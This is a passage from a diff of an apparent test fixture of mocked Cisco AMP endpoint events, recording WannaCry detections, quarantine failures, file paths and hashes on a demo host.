found"},"computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","identity":{"sha256":"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa"}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419204905956803000,"timestamp":1610629578,"timestamp_nanoseconds":800000000,"date":"2021-01-14T13:06:18+00:00","event_type":"Quarantine Failure","event_type_id":2164260880,"detection_id":"6419204905956802580","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","error":{"error_code":3221225558,"description":"Delete pending"},"computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","identity":{"sha256":"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa"}}}} 
-{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419204905956803000,"timestamp":1610629578,"timestamp_nanoseconds":644000000,"date":"2021-01-14T13:06:18+00:00","event_type":"Threat Detected","event_type_id":1090519054,"detection":"W32.Ransom:Gen.20gl.1201","detection_id":"6419204905956802579","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"8.8.8.8","user":"user@testdomain.com","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"u.wnry","file_path":"\\\\?\\C:\\ProgramData\\qzkbplcgew884\\u.wnry","identity":{"sha256":"b9c5d4339809e0ad9a00d4d3dd26fdf44a32819a54abf846bb9b560d81391c25","sha1":"45356a9dd616ed7161a3b9192e2f318d0ab5ad10","md5":"7bf2b57f2a205768755c07f238fb32cc"},"parent":{"process_id":4688,"disposition":"Malicious","file_name":"tasksche.exe","identity":{"sha256":"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa"}}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419204905956803000,"timestamp":1610629578,"timestamp_nanoseconds":286000000,"date":"2021-01-14T13:06:18+00:00","event_type":"Threat 
Detected","event_type_id":1090519054,"detection":"W32.File.MalParent","detection_id":"6419204905956802580","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"8.8.8.8","user":"user@testdomain.com","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"tasksche.exe","file_path":"\\\\?\\C:\\ProgramData\\qzkbplcgew884\\tasksche.exe","identity":{"sha256":"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa"}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419204905956803000,"timestamp":1610629578,"timestamp_nanoseconds":800000000,"date":"2021-01-14T13:06:18+00:00","event_type":"Threat Quarantined","event_type_id":553648143,"detection_id":"6419204905956802579","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","identity":{"sha256":"b9c5d4339809e0ad9a00d4d3dd26fdf44a32819a54abf846bb9b560d81391c25"}}}} 
-{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419204901661835000,"timestamp":1610629577,"timestamp_nanoseconds":802000000,"date":"2021-01-14T13:06:17+00:00","event_type":"Quarantine Failure","event_type_id":2164260880,"detection_id":"6419204901661835277","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","error":{"error_code":3221225558,"description":"Delete pending"},"computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","identity":{"sha256":"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa"}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419204901661835000,"timestamp":1610629577,"timestamp_nanoseconds":646000000,"date":"2021-01-14T13:06:17+00:00","event_type":"Quarantine Failure","event_type_id":2164260880,"detection_id":"6419204897366867976","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","error":{"error_code":3221225524,"description":"Object name not 
found"},"computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","identity":{"sha256":"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa"}}}} \ No newline at end of file +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419229331435815000,"timestamp":1610635265,"timestamp_nanoseconds":166000000,"date":"2021-01-14T14:41:05+00:00","event_type":"Quarantine Failure","event_type_id":2164260880,"detection_id":"6419229327140847664","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","error":{"error_code":3221225524,"description":"Object name not found"},"computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"81.2.69.144","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","identity":{"sha256":"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa"}}}} 
+{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419229331435815000,"timestamp":1610635265,"timestamp_nanoseconds":166000000,"date":"2021-01-14T14:41:05+00:00","event_type":"Quarantine Failure","event_type_id":2164260880,"detection_id":"6419229327140847663","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","error":{"error_code":3221225558,"description":"Delete pending"},"computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"81.2.69.144","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","identity":{"sha256":"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa"}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419229331435815000,"timestamp":1610635265,"timestamp_nanoseconds":166000000,"date":"2021-01-14T14:41:05+00:00","event_type":"Quarantine Failure","event_type_id":2164260880,"detection_id":"6419229327140847662","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","error":{"error_code":3221225524,"description":"Object name not 
found"},"computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"81.2.69.144","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","identity":{"sha256":"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa"}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419229331435815000,"timestamp":1610635265,"timestamp_nanoseconds":166000000,"date":"2021-01-14T14:41:05+00:00","event_type":"Quarantine Failure","event_type_id":2164260880,"detection_id":"6419229327140847661","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","error":{"error_code":3221225524,"description":"Object name not found"},"computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"81.2.69.144","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","identity":{"sha256":"24d004a104d4d54034dbcffc2a4b19a11f39008a575aa614ea04703480b1022c"}}}} 
+{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419229331435815000,"timestamp":1610635265,"timestamp_nanoseconds":166000000,"date":"2021-01-14T14:41:05+00:00","event_type":"Quarantine Failure","event_type_id":2164260880,"detection_id":"6419229327140847659","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","error":{"error_code":3221225761,"description":"Cannot delete"},"computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"81.2.69.144","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","identity":{"sha256":"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa"}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419229331435815000,"timestamp":1610635265,"timestamp_nanoseconds":166000000,"date":"2021-01-14T14:41:05+00:00","event_type":"Quarantine Failure","event_type_id":2164260880,"detection_id":"6419229327140847657","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","error":{"error_code":3221225558,"description":"Delete 
pending"},"computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"81.2.69.144","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","identity":{"sha256":"24d004a104d4d54034dbcffc2a4b19a11f39008a575aa614ea04703480b1022c"}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419229331435815000,"timestamp":1610635265,"timestamp_nanoseconds":572000000,"date":"2021-01-14T14:41:05+00:00","event_type":"Threat Detected","event_type_id":1090519054,"detection":"W32.File.MalParent","detection_id":"6419229331435814973","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"81.2.69.144","user":"user@testdomain.com","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"tasksche.exe","file_path":"\\\\?\\C:\\ProgramData\\qzkbplcgew884\\tasksche.exe","identity":{"sha256":"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa"}}}} 
+{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419229331435815000,"timestamp":1610635265,"timestamp_nanoseconds":120000000,"date":"2021-01-14T14:41:05+00:00","event_type":"Threat Detected","event_type_id":1090519054,"detection":"W32.Ransom:Gen.20gl.1201","detection_id":"6419229331435814969","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"81.2.69.144","user":"user@testdomain.com","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"u.wnry","file_path":"\\\\?\\C:\\ProgramData\\qzkbplcgew884\\u.wnry","identity":{"sha256":"b9c5d4339809e0ad9a00d4d3dd26fdf44a32819a54abf846bb9b560d81391c25","sha1":"45356a9dd616ed7161a3b9192e2f318d0ab5ad10","md5":"7bf2b57f2a205768755c07f238fb32cc"},"parent":{"process_id":1008,"disposition":"Malicious","file_name":"tasksche.exe","identity":{"sha256":"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa"}}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419229331435815000,"timestamp":1610635265,"timestamp_nanoseconds":73000000,"date":"2021-01-14T14:41:05+00:00","event_type":"Threat 
Detected","event_type_id":1090519054,"detection":"W32.File.MalParent","detection_id":"6419229331435814970","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"81.2.69.144","user":"user@testdomain.com","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"tasksche.exe","file_path":"\\\\?\\C:\\ProgramData\\qzkbplcgew884\\tasksche.exe","identity":{"sha256":"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa"}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419229331435815000,"timestamp":1610635265,"timestamp_nanoseconds":26000000,"date":"2021-01-14T14:41:05+00:00","event_type":"Threat 
Detected","event_type_id":1090519054,"detection":"W32.Ransom:Gen.20gl.1201","detection_id":"6419229331435814968","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"81.2.69.144","user":"user@testdomain.com","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"tasksche.exe","file_path":"\\\\?\\C:\\ProgramData\\qzkbplcgew884\\tasksche.exe","identity":{"sha256":"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa"}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419229331435815000,"timestamp":1610635265,"timestamp_nanoseconds":166000000,"date":"2021-01-14T14:41:05+00:00","event_type":"Threat 
Quarantined","event_type_id":553648143,"detection_id":"6419229327140847660","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"81.2.69.144","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","identity":{"sha256":"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa"}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419229331435815000,"timestamp":1610635265,"timestamp_nanoseconds":166000000,"date":"2021-01-14T14:41:05+00:00","event_type":"Threat Quarantined","event_type_id":553648143,"detection_id":"6419229327140847658","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"81.2.69.144","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","identity":{"sha256":"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa"}}}} 
+{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419229331435815000,"timestamp":1610635265,"timestamp_nanoseconds":166000000,"date":"2021-01-14T14:41:05+00:00","event_type":"Threat Quarantined","event_type_id":553648143,"detection_id":"6419229322845880359","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"81.2.69.144","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","identity":{"sha256":"24d004a104d4d54034dbcffc2a4b19a11f39008a575aa614ea04703480b1022c"}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419229327140848000,"timestamp":1610635264,"timestamp_nanoseconds":870000000,"date":"2021-01-14T14:41:04+00:00","event_type":"Threat 
Detected","event_type_id":1090519054,"detection":"W32.File.MalParent","detection_id":"6419229327140847671","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"81.2.69.144","user":"user@testdomain.com","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"tasksche.exe","file_path":"\\\\?\\C:\\ProgramData\\qzkbplcgew884\\tasksche.exe","identity":{"sha256":"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa"}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419229327140848000,"timestamp":1610635264,"timestamp_nanoseconds":698000000,"date":"2021-01-14T14:41:04+00:00","event_type":"Threat 
Detected","event_type_id":1090519054,"detection":"W32.ED01EBFBC9-100.SBX.TG","detection_id":"6419229327140847666","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"81.2.69.144","user":"user@testdomain.com","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"tasksche.exe","file_path":"\\\\?\\C:\\ProgramData\\qzkbplcgew884\\tasksche.exe","identity":{"sha256":"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa","sha1":"5ff465afaabcbf0150d1a3ab2c2e74f3a4426467","md5":"84c82835a5d21bbcf75a61706d8ab549"},"parent":{"process_id":5748,"disposition":"Clean","file_name":"cmd.exe","identity":{"sha256":"17f746d82695fa9b35493b41859d39d786d32b23a9d2e00f4011dec7a02402ae","sha1":"ee8cbf12d87c4d388f09b4f69bed2e91682920b5","md5":"ad7b9c14083b52bc532fba5948342b98"}}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419229327140848000,"timestamp":1610635264,"timestamp_nanoseconds":667000000,"date":"2021-01-14T14:41:04+00:00","event_type":"Threat 
Detected","event_type_id":1090519054,"detection":"W32.ED01EBFBC9-100.SBX.TG","detection_id":"6419229327140847665","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"81.2.69.144","user":"user@testdomain.com","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"tasksche.exe","file_path":"\\\\?\\C:\\ProgramData\\qzkbplcgew884\\tasksche.exe","identity":{"sha256":"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa","sha1":"5ff465afaabcbf0150d1a3ab2c2e74f3a4426467","md5":"84c82835a5d21bbcf75a61706d8ab549"},"parent":{"process_id":4772,"disposition":"Malicious","file_name":"tasksche.exe","identity":{"sha256":"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa"}}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419229327140848000,"timestamp":1610635264,"timestamp_nanoseconds":28000000,"date":"2021-01-14T14:41:04+00:00","event_type":"Threat 
Detected","event_type_id":1090519054,"detection":"W32.Gen.20gl.1201","detection_id":"6419229327140847656","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"81.2.69.144","user":"user@testdomain.com","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"mssecsvc.exe","file_path":"\\\\?\\C:\\WINDOWS\\mssecsvc.exe","identity":{"sha256":"24d004a104d4d54034dbcffc2a4b19a11f39008a575aa614ea04703480b1022c"},"parent":{"process_id":708,"disposition":"Clean","file_name":"lsass.exe","identity":{"sha256":"26f36ca31a1b977685f8df5f8436848b7d4143b47ec0dae68f8382c1b52a6c71","sha1":"7abcc82dc5a05b4f53fd0fbd386738e5555025cf","md5":"4e568dbe3fff1a0025eb432dc929b78f"}}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419229322845880000,"timestamp":1610635263,"timestamp_nanoseconds":950000000,"date":"2021-01-14T14:41:03+00:00","event_type":"Threat 
